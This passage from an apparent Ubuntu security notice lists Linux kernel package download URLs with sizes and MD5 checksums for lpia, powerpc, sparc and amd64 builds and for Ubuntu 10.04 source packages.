http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    35292 fc88bbd3fd4ada2002bdbb7dda4784bf\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:     6828 495fe0c7945276ad8055ff66aef0c870\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    86098 309c17f97610d6901a49ec7deee22282\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    46412 3a56ab298ad69fa20a59243dc90d91b3\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:     8900 dbb82fccbacffd5147b0a4ba42e73fb0\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    36270 f275023b9b741f5383a4adcb3c20d8fc\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    21666 a10e2c6899f03445dc3fd431b04e389b\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:  1495072 a60482e79efeafe8f7c5544b7aac4d25\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    44064 c5c8d43cdfedaf45b3bcb0ad5cebcf5e\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    48540 a81308e2c1a4e85467c70dc11586a35e\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:   117832 0fdbb4919cd2f93e13304a484a76b890\n    http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    14516 f87cbe777565bffc6791d917445a8ed2\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   321492 a6e3955497936e2d8d21d663f79217a8\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   263650 c39b24ef95a57138b0c8c29d8ebd1db1\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    58862 623da2e39d70d011def84a9876f404f7\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    67046 b7ef32e1debe5e3897b29bf892a205a3\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    45932 ad59fb0a080fbd3f0c54c489fc1a2b41\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    51298 255d5493db43cfcb76868955f47e11a6\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    90698 549cbf218bbe9b9ca431c42995dd0895\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   105162 f4a5cdf80fdb0d8b50b66266e2a67600\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    39486 1cc5b805673f1e8ca877d80199bd35be\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    39270 c80c6ee3f07888fa3c6f3c6147bf9a9c\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   581030 48870bec4d7c78fbc4d447935a7fed0a\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   626342 71f4768f5551e771ab87f2621da8097b\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   149306 ce090bfc2dd1317de4d461e605d74101\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   147320 b3947ba223bd39bce44748fb8a737100\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    79708 998771d5afc49f155a7a028446f0386a\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    84132 677a36642f9fa2d4ac4876e7c4c8588e\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   402940 f38251cc951d684a5052d3765152fdac\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   342490 bbb42db83979db7bddad061bd10c19a3\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:  3838604 3dc50a2b64f2864947576cfdb07c8ccd\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:  5223500 d454911ee6879d2a8e3e09ef756525a0\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-powerpc-smp_2.6.31-22.60_powerpc.deb\n      Size/MD5:   795016 dc961bb4deb5e0f7cc8594d3b42fcccd\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-powerpc64-smp_2.6.31-22.60_powerpc.deb\n      Size/MD5:   813182 cfdf6137c9db4ff068f8377641a6f994\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-powerpc_2.6.31-22.60_powerpc.deb\n      Size/MD5:   794466 7098cc192d736432f69d6461b6b2f1e5\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-22-powerpc-smp_2.6.31-22.60_powerpc.deb\n      Size/MD5: 24881134 d3a7996bfa4ca9d00ffa138e8af07a65\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-22-powerpc64-smp_2.6.31-22.60_powerpc.deb\n      Size/MD5: 25859358 1896b217a23fecdef7fa4f4108b5a39d\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-22-powerpc_2.6.31-22.60_powerpc.deb\n      Size/MD5: 24711328 090a1826d0b29376957bd285a00bec55\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-22.60_powerpc.deb\n      Size/MD5:   738524 6a069b9d476c1302d17b59b97d9f5fef\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   272172 ed7a1d4d22a74235e0e945cd00618b3b\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   294756 b0fda03144d279b6d8c11ba4a151ff0b\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   210594 c2dbac3b914f766e9eef15e760579805\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   217030 6f3106804d19966c219d7f3ef60e7ec0\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    26370 4918a8a9b630381d08931f36e98a6ba3\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    29680 dbf2a64751a6b805c38a2671588cd55b\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   315082 c4cc05ae803543c34dbc5b84bb506fc6\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   357610 169b16c940142485d187019ae62dfba3\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:  2027744 72cac22305c06de13610f3e4cb732000\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:  2247756 eeac477bd4452047bd4e054438ce5ae1\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   213540 539abf10cc8075cff2aaeb7a5d2a4415\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   209828 07bf91d64a9c1ca41d847d1d45145859\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   210294 d03b6378e07b7d16a8060805d5a33a1e\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   244890 35b7664b5b7866124f07498565492550\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   111850 76a16b3ec983c1456a847b74b058c84d\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   131634 42b2955a56db91a6734e79fabe4b6eb7\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    49036 9f95af70a86ea344deb82828097f33ac\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    44086 d8d27fda02b3a2eccd1bb295513b0ae2\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:     5848 ca06ac8de8f328c81d274625018c28dc\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:     6510 19263161420a4414cca39b3e176ed1fe\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    79130 f9547fa7a009cfc1fdace53f207e66e0\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    85236 783f47a75d9e82f999273ae34ecb2bad\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    74332 09ced5601534f6721803bc936d4474a6\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    27270 8fca637189a591b726e81d9f759de81e\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:     8542 5e50b93423cef9abfa0e1224b0706042\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:     9816 645a211d3b5072ddfd2494355f612081\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    58820 d1e640be1163d46f9c4d30f16bc5d489\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    70146 df3e05fd190bbdee466474050abf6d4d\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    23716 df0ec1c32f484026626eba3aceee8bd0\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    30798 d34084fae6d01f175c520a7ee88ae885\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:  1557496 8b2c2babeeb812ff28154713e33b68fc\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:  1509500 140ca736b92247392b5f7a81c6112824\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    81652 2f7f7e13c32879ede7d9444b7d0d82c1\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    88506 eb5516ed210ea0daef38e35a63497716\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    64574 93994b13239fa750556d18cc981ead23\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    77178 88f35d2608a8c3e187ffddbc1d1249cc\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   141566 1705c06d42087933e0bc8078790c00d1\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   151400 5a4f2e223dd56b134c2a1bd52a5fdab6\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:   139446 c7baab61c8a09b5ebef664ba84316425\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:    70116 cbc95ad9771e8414cdf22bc424b7e257\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:    46514 6cd9a6fed2a5aae88598be99e139952a\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:    93986 5eac60dfd4283e77a7ced7e36f4bda4c\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:   588776 425ae2acd1afcbeff7468ea90c778300\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:   148400 5cf7b0187e50f5c17a0a951650ad19ff\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:    75882 089f804226b3cac5e0f007704b5fbc3e\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:  2915232 bdb3bc98fccde0f109a49486b8f4fd79\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-sparc64-smp_2.6.31-22.60_sparc.deb\n      Size/MD5:   612074 601db402e4c301ea1f3c7838655e4bf2\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-sparc64_2.6.31-22.60_sparc.deb\n      Size/MD5:   611672 5611adee164ba7997a9dc6a35cc03919\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-22-sparc64-smp_2.6.31-22.60_sparc.deb\n      Size/MD5: 20554024 4ad3050a3a26f3470c2df6cf32ea12a2\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-22-sparc64_2.6.31-22.60_sparc.deb\n      Size/MD5: 20242858 42fa813a7d01a6864dc27d8b5602afee\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-22.60_sparc.deb\n      Size/MD5:   750612 8957e1fb11e133d1e6c056ae25fb1921\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:   266438 128f34223118495af4a21daf6fbf9099\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:   209154 a2f428054c4405bb238d2be5dc54ce17\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:    26792 1ca186e1ac28aa3aff15bdd6060d07bd\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:   314212 212236bfb1dc174322ca6e9f277de47b\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:  1675454 da2055579d886793a3ff4c0118f451d6\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:   222868 bedf62d04baa61688881e77c64fa7c15\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:   121974 b1b8381f0c79f3b6466d6baf71446f08\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:    38796 e04e8345ec4eab7514fb38c751d561c6\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:   100826 39ba938bb7bd38eeb830b1a3d75e2155\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:     8928 18206a9f5a2a84dcdc7bab536d389156\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:    62912 c16890ee3c8ad593ce2ca0d60bf55194\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:   120986 0f766f53e118900c8cc33fbb7ec591f2\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:  1218150 17f468abbea9fb86f77c5bad73c3a73e\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:   101542 02cf5f3466caf54628bfadfabbdb86d6\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:   200226 5cd4a933a0218730a5906011c5bc031d\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:   185114 af6cfb5ab8a3e15eac5005f1c78d2507\n\nUpdated packages for Ubuntu 10.04:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.32-306.11.diff.gz\n      Size/MD5:  8482468 87193041e67aa771132606051612da46\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.32-306.11.dsc\n      Size/MD5:     1502 cf51bda52f14984a1c3913d585b94dcd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.32.orig.tar.gz\n      Size/MD5: 81900940 4b1f6f6fac43a23e783079db589fc7e2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-608.14.diff.gz\n      Size/MD5:  5383378 def0a5c447ec67f86d849bb83fb8d2fa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-608.14.dsc\n      Size/MD5:     2180 a4fdcf52dbda79869b8dc1a9b0d41fe8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31.orig.tar.gz\n      Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.32-205.18.diff.gz\n      Size/MD5:  6748240 2a5a075f68fceef9902a1e194463ed25\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.32-205.18.dsc\n      Size/MD5:     1464 6d6a8254b60e8244b1f96b4d85d6687e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.32.orig.tar.gz\n      Size/MD5: 81900940 4b1f6f6fac43a23e783079db589fc7e2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-qcm-msm/linux-qcm-msm_2.6.31-802.4.diff.gz\n      Size/MD5:  4275510 2e55ad3f665eba2ccfa99804c5f61941\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-qcm-msm/linux-qcm-msm_2.6.31-802.4.dsc\n      Size/MD5:     2162 a0268c009b0452ce1d6bbfaba3ef0537\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-qcm-msm/linux-qcm-msm_2.6.31.orig.tar.gz\n      Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ti-omap/linux-ti-omap_2.6.33-501.7.diff.gz\n      Size/MD5:  3434570 c246b6f07ee762ee5c6c13b8d064507d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ti-omap/linux-ti-omap_2.6.33-501.7.dsc\n      Size/MD5:     1442 43cfcac6c98558e0dd45b6a13873c5eb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ti-omap/linux-ti-omap_2.6.33.orig.tar.gz\n      Size/MD5: 87197318 83dfcb85de817d9b63ee31937118c9c3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.32-22.35.diff.gz\n      Size/MD5:  4621518 c2fc8cc8caf3e8d8908bb4732a60d33c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.32-22.35.dsc\n      Size/MD5:     5568 b7b30fce01964ef809d3395f29c0f22d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.32.orig.tar.gz\n      Size/MD5: 81900940 4b1f6f6fac43a23e783079db589fc7e2\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.32-306.11_all.deb\n      Size/MD5:  6391790 9934fb97782458b5a5a108364b86420b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.32_2.6.32-306.11_all.deb\n      Size/MD5: 68063660 bb66d042a1242106996c48d03bd54046\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.32-306_2.6.32-306.11_all.deb\n      Size/MD5: 10003726 932c5faf79a155d5370beb510831362d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.32-22.35_all.deb\n      Size/MD5:  6391904 582ebf59bf8ab2d33b7c7801647f64ac\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22_2.6.32-22.35_all.deb\n      Size/MD5:  9867826 a112051f276dfe638c98adfbe2cda80a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.32_2.6.32-22.35_all.deb\n      Size/MD5: 65820192 c149de16c0b96afb2c8c98d4a5884d95\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-tools-common_2.6.32-22.35_all.deb\n      Size/MD5:    60636 0bd150c7fc457da6d1fdcab7f45b9f11\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.32-306-ec2_2.6.32-306.11_amd64.deb\n      Size/MD5:   644868 cd3691870ce135309d16a78adbf93987\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.32-306-ec2_2.6.32-306.11_amd64.deb\n      Size/MD5: 19834952 257f5cfe67bd2e727bb8b304d3301993\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:   237840 9a34fe2a5b057dc2b1daf0fd30850943\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    16524 eb35584a630e3a85766ea5ce0c4f6365\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    50052 eefea187a93724843bd127552830ac1b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    46262 57bf21e6ee6fb7cc5f9ef8fc40d08d6a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    51764 cd3379b942e04b3200473484370fb876\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    95192 402d06156f91240b619e96f22dd75ea3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    38660 85256686a4855537b2e8214f51a8581d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:   538882 c1d7290a91896acc094f0a26407dece2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:   133544 e75341c9805a52943d5720f1dfa720bd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    98914 e5fb0f13ddbd94ffe79ccdff3cf0f7d3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:   320120 a00104d9f50d0d65c86aaf575b35e11c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:  4449968 5583c3906b7ffa87fe64c0117f946fa0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-generic_2.6.32-22.35_amd64.deb\n      Size/MD5:   744950 e2bf6a508794318db16cc6e30009d1ab\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-preempt_2.6.32-22.35_amd64.deb\n      Size/MD5:   746984 73361899082062e6b6907a58b65e13dc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-server_2.6.32-22.35_amd64.deb\n      Size/MD5:   746996 